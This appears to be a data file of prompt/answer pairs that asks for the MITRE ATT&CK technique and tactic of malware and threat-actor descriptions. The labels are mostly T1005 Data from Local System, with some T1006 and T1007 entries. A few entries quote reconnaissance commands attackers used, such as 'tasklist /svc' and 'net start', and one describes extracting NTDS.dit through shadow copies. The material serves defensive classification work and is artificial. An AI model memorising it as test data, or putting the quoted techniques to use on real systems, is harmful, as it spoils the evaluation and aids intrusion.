+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT can collect local data from an infected machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey can collect information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can collect data on a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has uploaded files from victims' machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When it first starts, BADNEWS crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has uploaded files from victim machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook can collect local files from the system .,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot collects files from the local system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can retrieve information from the infected machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has collected information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackMould can copy files on a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon can upload files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has the ability to upload files from a compromised system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can capture and compress stolen credentials from the Registry and volume shadow copies.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto can collect data from user directories.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell has a module to collect information from the local database.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can collect data and files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component can upload local files.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can collect data from a local system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can collect information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can collect data from a local system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has retrieved iPhone text messages from iTunes phone backup files.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke steals user files from local hard drives with file extensions that match a predefined list.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can upload files to C2 from victim machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can collect information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch can exfiltrate files from compromised systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cryptoistic can retrieve files from the local file system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can upload files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can collect information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can upload files from compromised hosts.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can collect files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can upload files from infected machines after receiving a command with `uploaddd` in the string.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can transfer files from the victim machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can collect a variety of information from victim machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can collect sensitive NTLM material from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system. FLASHFLOOD will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. FLASHFLOOD also collects information stored in the Windows Address Book.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can copy files and directories from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can collect data from a compromised host, including Windows authentication information.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has collected information and files from a compromised machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can retrieve configuration data from a compromised AD FS server.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Forfiles can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FrameworkPOS can collect elements related to credit card data from process memory.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can upload files from victims' machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can collect data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to exfiltrate documents from infected systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can collect data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can collect data and files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit can upload files from compromised machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can read data from files.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can collect files, passwords, and other data from a compromised host.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can collect data from the system, and can monitor changes in specified directories.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe can collect data from a local system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can send a file containing victim system information to C2.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has stored collected information and discovered processes in a tmp file.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK can gather information from compromised hosts.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar uploads files from a specified directory to the C2 server.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can upload logs and other data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can download files off the target system to send back to the server.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron can collect files from a local system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can obtain data from local systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoFiSe can collect files of interest from targeted systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD has the ability to upload files from an infected device.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can collect then exfiltrate files from the compromised system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete searches the File system for files of interest.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can collect files and information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can upload data from the victim's machine to the C2 server.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can upload files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has collected files and data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat has collected files and data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MobileOrder exfiltrates data collected from the victim mobile device.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall has the ability to upload files from victim's machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae has the capability to upload collected files to C2.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can upload files from a victim's machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use a file monitor to steal specific files from targeted systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has the ability to upload files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus can exfiltrate files from the system using a documents collector tool.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Out1 can copy files and Registry data from compromised hosts.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can collect information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell has the ability to copy files on a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can upload files from compromised hosts.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHTRACK scrapes memory for properly formatted payment card data.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pasam creates a backdoor through which remote attackers can retrieve files.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can collect files and information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pcexter can upload files from targeted systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has collected credit card data using native API functions.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PinchDuke collects user files from the compromised host based on predefined file extensions.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can collect data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy creates a backdoor through which remote attackers can steal system information.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc searches the local system and gathers data.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use a variety of commands, including esentutl.exe to steal sensitive data from Internet Explorer and Microsoft Edge, to acquire information that is subsequently exfiltrated.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can retrieve files from compromised client machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve can collect files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RAPIDPULSE retrieves files from the victim system via encrypted commands sent to the web shell.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can collect data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can collect host data and specific file types.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can collect Microsoft Word documents from the target's file system, as well as .txt, .doc, and .xls files from the Internet Explorer cache.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun has collected data and files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover searches for files on local drives based on a predefined list of file extensions.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to access the file system on a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE can read files specified on the local system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has uploaded files and information from victim machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE can collect data from an infected local host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can collect data from an infected host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can collect files and information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can leverage an exfiltration module to download arbitrary files from compromised machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to collect data from a compromised machine to deliver to the attacker.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can upload files to its C2.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco has dropped a recent-files stealer plugin to `C:\Users\Public\WinSrcNT\It11.exe`.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has the capability to upload collected files to a C2.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has the ability to upload files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has collected data and files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette has collected data and other information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can collect data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can collect information and files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can upload data and files from a victim's machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to steal documents from the local system including the print spooler queue.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can collect data and files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla can upload files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot collects local files and information from the victim’s local machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can collect information from an air-gapped host machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use its `Get` command to exfiltrate specified files from the compromised system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has collected files from victim machines, including certificates and cookies.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can collect data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can exfiltrate files from the victim machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can send files from the victim machine to C2.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wevtutil can be used to export events from a specific log.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can collect information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox has the ability to upload files from a targeted system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can transfer files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ can collect data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can collect files from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: esentutl can be used to collect data from local file systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can collect files and system information from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can collect data from a local system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has uploaded files from victims' machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has created volume shadow copies of virtual domain controller disks to extract the `NTDS.dit` file.,"Tecnique: T1006 Direct Volume Access, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: esentutl can use the Volume Shadow Copy service to copy locked files such as `ntds.dit`.,"Tecnique: T1006 Direct Volume Access, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net start` command as part of their initial reconnaissance.","Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors.","Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 used the commands net start and tasklist to get a listing of the services on the system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has attempted to discover services for third party EDR products.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used TROJ_GETVERSION to discover system services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used net start and net use for system service discovery.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used Tasklist to obtain information from a compromised host.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used the win32_service WMI class to retrieve a list of services from the system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang performs service discovery using net start commands.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used an instrumentor script to gather the names of all services running on a victim's system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used sc query on a victim to gather information about services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After compromising a victim, Poseidon Group discovers all running services.","Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover running services and associated processes using the tasklist /svc command.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: net start >> %temp%\download,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT can query service configuration information.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk can enumerate all services running on a compromised host.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
